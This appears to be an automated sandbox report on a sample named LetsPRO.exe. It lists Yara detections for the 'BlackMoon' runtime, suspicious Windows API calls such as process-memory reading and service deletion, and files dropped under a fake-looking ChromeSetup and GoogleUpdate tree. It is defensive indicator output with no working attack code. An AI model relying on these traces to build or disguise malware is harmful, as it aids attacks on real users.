                  Yara detected BlackMoon Ransomware
                  Source: Yara matchFile source: 5.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.LetsPRO.exe.1003c7a7.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.LetsPRO.exe.10020253.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.2207790099.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2130925911.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.2130966068.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.2139603630.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2133672402.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.2139915999.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.2132609857.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.2139674546.0000000010020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 4320, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 4564, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 5440, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 4912, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 5480, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 5520, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 412, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 6408, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 7224, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 7232, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 7268, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 7284, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: LetsPRO.exe PID: 7380, type: MEMORYSTR
                  Source: LetsPRO.exeProcess created: 50

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 5.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 14.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 5.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 19.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 13.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 31.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 14.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 26.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 26.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 15.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 19.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 17.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 28.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 17.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 15.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 31.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 18.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 27.2.LetsPRO.exe.1003c7a7.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 4.2.LetsPRO.exe.1003c7a7.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 27.2.LetsPRO.exe.10020253.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 28.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 29.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 13.2.LetsPRO.exe.10020253.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 4.2.LetsPRO.exe.10020253.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 29.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: 18.2.LetsPRO.exe.1003c7a7.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDBECEA NtdllDefWindowProc_W,30_2_6CDBECEA
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDBE87A NtdllDefWindowProc_W,CreateSolidBrush,CreateSolidBrush,30_2_6CDBE87A
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCA310D NtDeleteKey,30_2_6CCA310D
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCA0203 OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,CloseHandle,30_2_6CCA0203
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD3E5C8 NtdllDefWindowProc_W,30_2_6CD3E5C8
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDBF2E5 NtdllDefWindowProc_W,CreateSolidBrush,30_2_6CDBF2E5
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD58759 GetCurrentThreadId,PeekMessageW,CreateTimerQueue,NtdllDefWindowProc_W,30_2_6CD58759
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCA012C NtQueryInformationProcess,GetModuleHandleW,GetProcAddress,30_2_6CCA012C
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD42272: CreateFileW,DeviceIoControl,CloseHandle,30_2_6CD42272
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCA9CE2 OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle,30_2_6CCA9CE2
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCA07CF CreateProcessAsUserW,30_2_6CCA07CF
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5bb04a.msiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{26E6D275-3FC7-41A2-B8C2-458B639029D2}Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB403.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB404.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB54D.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB59C.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5FB.tmpJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC11.tmpJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmpJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmpJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUTBC13.tmpJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exeJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exeJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exeJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exeJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exeJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dllJump to behavior
                  Source: C:\Program Files (x86)\ChromeSetup.exeFile created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exeJump to behavior
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Windows\SystemTemp\GUMD96D.tmp
                  Source: C:\Windows\System32\netsh.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIB404.tmpJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_004012C04_2_004012C0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F36EE04_2_03F36EE0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F36C504_2_03F36C50
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F483814_2_03F48381
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F4E3414_2_03F4E341
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F4EA1D4_2_03F4EA1D
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F4F9FF4_2_03F4F9FF
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F389004_2_03F38900
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F4D89F4_2_03F4D89F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C966EF85_2_6C966EF8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C906E645_2_6C906E64
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C906E685_2_6C906E68
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C96E8D15_2_6C96E8D1
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9968FF5_2_6C9968FF
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9209595_2_6C920959
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C980A155_2_6C980A15
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C93EB8A5_2_6C93EB8A
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9084A85_2_6C9084A8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9145EE5_2_6C9145EE
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C8F21F05_2_6C8F21F0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9082CB5_2_6C9082CB
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94A2E75_2_6C94A2E7
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C90A21D5_2_6C90A21D
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9642395_2_6C964239
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C96238D5_2_6C96238D
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9083DB5_2_6C9083DB
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9883205_2_6C988320
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C909CCE5_2_6C909CCE
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C997C2A5_2_6C997C2A
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C903DF15_2_6C903DF1
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C981DEF5_2_6C981DEF
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C907D605_2_6C907D60
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C905E605_2_6C905E60
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C94DFA95_2_6C94DFA9
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C96B8035_2_6C96B803
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C98D8545_2_6C98D854
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C96F99A5_2_6C96F99A
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C9699575_2_6C969957
